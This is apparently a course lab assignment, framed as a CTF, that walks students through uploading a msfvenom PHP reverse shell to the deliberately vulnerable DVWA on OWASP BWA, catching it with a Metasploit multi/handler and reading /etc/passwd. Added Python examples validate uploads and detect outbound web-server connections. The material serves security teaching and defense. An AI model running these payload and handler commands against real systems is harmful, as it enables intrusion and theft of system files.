Project-1: Getting a Reverse Shell

In this project, you are assigned the task of stealing the /etc/passwd file of the OWASP BWA computer in a CTF (Capture-the-Flag) event. You discovered that OWASP BWA hosts a vulnerable web application. First, you crack the password of the web application; then you log in to the web application and exploit it in a way that allows you to steal the passwd file of the server on which this web app is running.

Reminder

Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting the project.

Computers

Notes:

1) You will perform all of your actions from Kali Linux.

2) You cannot copy and paste between your computer and the computers in the Netlab environment; however, it will be both quicker and more reliable if you use your keyboard's Tab key after writing the first 2-3 letters of each command or command parameter in Metasploit.

3) Use CTRL and the minus key to shrink the fonts in Kali Linux terminal windows; alternatively, you can click on the View menu and then the Shrink Font menu item.

Steps of Hacking

1. Optional: Crack the password of the admin user of the web application at http://192.168.2.15/dvwa/login.php. (This is the same lab you performed in Lab-7, Section-3.)

2. Create a PHP backdoor (reverse PHP shell) by using msfvenom (A tool from Metasploit Framework)

3. Upload the PHP backdoor to the web application. (Being able to upload a PHP file is yet another vulnerability, though an easy one to exploit. You will practice this local file upload vulnerability in detail in Lab-8, Section-2.)

4. Prepare a handler on Kali Linux that will wait for the connection requests from the exploited web application and later on send commands to the same web application.

5. Call the reverse shell you uploaded (open the PHP file in the browser on Kali).

6. Send a command through the reverse shell to the vulnerable web application and fetch the /etc/passwd file of the OWASP BWA computer (192.168.2.15).

The List of Actions/Commands per Step

1. Crack the password of the admin user of the web application

This part is optional. If you want to practice it once more, see Lab-7, Section-3. This part has been included in the project for the sake of logical completeness. If this were a real hacking case, the hacker would have to perform this step before the upcoming steps.

2. Create a PHP backdoor (reverse shell)

Command: msfvenom -p php/reverse_php LHOST=192.168.2.10 LPORT=443 -f raw > reverseshell.php

Notes: File created: reverseshell.php

3. Upload PHP backdoor to the DVWA

Find the link to upload a file in the left menu after logging into the web app with the cracked password. Refer to the Lab-8, Section-2 instructions to see the solution.
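The upload step works because DVWA stores whatever file it is given under the web root, where the server executes it as PHP. As an added example (not part of the lab or of DVWA's code), the function below shows the layered checks an upload handler should run to reject such a file; the sample uploads are constructed, and the stand-in payload is just a PHP open tag, not the msfvenom output.

```python
import os
import re
import secrets

# Constructed sample uploads (not from the lab): a genuine PNG header and the
# kind of raw PHP file that step 2 of the lab produces.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SAMPLES = {
    "photo.png": PNG_MAGIC + b"\x00" * 16,
    "reverseshell.php": b"<?php /* constructed stand-in for a msfvenom payload */ ?>",
    "shell.php.png": b"<?php /* renamed, no image header */ ?>",
    "polyglot.png": PNG_MAGIC + b"<?php /* valid header, PHP inside */ ?>",
}

# Allowed extension -> the magic bytes the file content must start with.
ALLOWED = {"png": PNG_MAGIC, "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}

def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Layered checks an upload handler should run before storing anything."""
    # 1. Only the final extension counts, and it must be on the allow-list.
    base = os.path.basename(filename)
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        return False, f"extension .{ext or '?'} not allowed"
    # 2. The bytes must look like the image type the extension claims.
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type"
    # 3. Cheap content scan: an image should never contain a PHP open tag.
    if re.search(rb"<\?(php|=)", data, re.IGNORECASE):
        return False, "embedded PHP tag"
    return True, "ok"

def storage_name(ext: str) -> str:
    """Random server-chosen name; the user's filename never reaches the disk."""
    return f"{secrets.token_hex(16)}.{ext}"

def check_all(samples=SAMPLES):
    """Run the validator over every constructed sample."""
    return {name: validate_upload(name, data) for name, data in samples.items()}

if __name__ == "__main__":
    for name, (ok, why) in check_all().items():
        print(f"{name:18} -> {'ACCEPT' if ok else 'REJECT'} ({why})")
```

Accepted files should additionally be written outside the web root (or to a directory where the server has PHP execution disabled), so that even a file that slips past these checks is served as data rather than run.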

4. Prepare a handler on Kali Linux

A PHP reverse shell on its own does not allow you to connect to the remote server (OWASP BWA). There must be a corresponding handler that responds to the connection request from the PHP reverse shell and sends commands to it. A handler can be regarded as a command and control server. The reverse shell is like an RC car, but it is only the car; the handler is the remote-control unit. Neither of them works alone. In this analogy, the frequency of the RC unit must match the frequency of the receiver in the car. Similarly, the parameters of the handler you are creating must be in full harmony with the parameters of the PHP shell.

Command: msfconsole
Notes: This command opens the Metasploit Framework console.

Command: search handler
Notes: This is an informational command. Just try to find handler among the search results.

Command: use exploit/multi/handler
Notes: Selects multi/handler, which is a stub that handles exploits launched outside of the framework (in this case, the reverseshell.php file).

Command: set payload php/reverse_php
Notes: Uses the reverse_php payload for this handler. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy.

Command: show options
Notes: This is yet another informational command. It shows the options of the module and its payload.

Command: set lhost 192.168.2.10
Notes: Option-1. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy.

Command: set lport 443
Notes: Option-2. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy.

Command: exploit
Notes: Runs the handler.

5. Call the reverse shell

After uploading the PHP file (in Step-3), the web application returned the path where the reverse shell was stored. Copy that path, append it to the web application's URL in a meaningful way, and hit Enter.

6. Send a command to the vulnerable web application and fetch the /etc/passwd file

Switch to the terminal window where you ran the handler with the exploit command. If you uploaded the PHP file in Step-3 and then called the file in Step-5 correctly, the PHP shell has already opened a connection to the handler and is waiting for the handler's commands. You should also see a handler message similar to "Command shell session 1 opened (192.168.2.10:443 -> 192.168.2.15:54585 at YYYY-MM-DD HH:MM:SS +Timezone)".

If you see the message above, type the command that dumps /etc/passwd into the terminal window; there is a standard Linux command called cat that writes the content of a file to the screen.

Take a screenshot of the terminal window showing the content of the passwd file.
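The session message in Step-6 shows what the handler in Step-4 and the shell look like from the network: the web server (192.168.2.15) is the client side of a TCP connection to port 443 on the attacker box. As an added example (not part of the lab), the script below shows how a defender on the web server would spot that from socket state; the `ss -tnp`-style lines are constructed, not captured from the lab.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout of `ss -tnp` on the web server (not captured
# from the lab). The last line matches the session the handler reports as
# 192.168.2.10:443 -> 192.168.2.15:54585.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
ESTAB  0      0      192.168.2.15:80      192.168.2.10:51022  users:(("apache2",pid=1201,fd=11))
ESTAB  0      0      192.168.2.15:22      192.168.2.20:40110  users:(("sshd",pid=988,fd=4))
ESTAB  0      0      192.168.2.15:54585   192.168.2.10:443    users:(("apache2",pid=1207,fd=13))
"""

WEB_PROCS = {"apache2", "httpd", "php-fpm", "nginx"}   # processes that should only accept
SERVED_PORTS = {80, 443, 8080}                          # local ports they legitimately serve on
LINE_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+'
    r'(?P<raddr>\S+):(?P<rport>\d+)\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)')

@dataclass
class Alert:
    proc: str
    pid: int
    local: str
    peer: str

def outbound_from_webserver(ss_text: str) -> list[Alert]:
    """Flag sockets where a web-server worker is the client side of a TCP
    connection, i.e. its local port is not one it serves. A reverse shell run
    by the web server looks exactly like this; normal request handling never does."""
    alerts = []
    for line in ss_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["state"] != "ESTAB":
            continue   # header line or non-established socket
        if m["proc"] in WEB_PROCS and int(m["lport"]) not in SERVED_PORTS:
            alerts.append(Alert(m["proc"], int(m["pid"]),
                                f'{m["laddr"]}:{m["lport"]}', f'{m["raddr"]}:{m["rport"]}'))
    return alerts

if __name__ == "__main__":
    for a in outbound_from_webserver(SS_OUTPUT):
        print(f"ALERT {a.proc}[{a.pid}] {a.local} -> {a.peer}")
```

The same rule ("the web server process never initiates connections") can be enforced rather than just detected with a host firewall egress rule for the web server's user, which would have stopped this lab's shell from ever reaching the handler.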

Weekly Learning and Reflection 

In two to three paragraphs (i.e., sentences, not bullet lists), using APA style citations if needed, summarize and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities you exploited, and what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, or graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also about what you have learned through the session. You can ask questions about the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.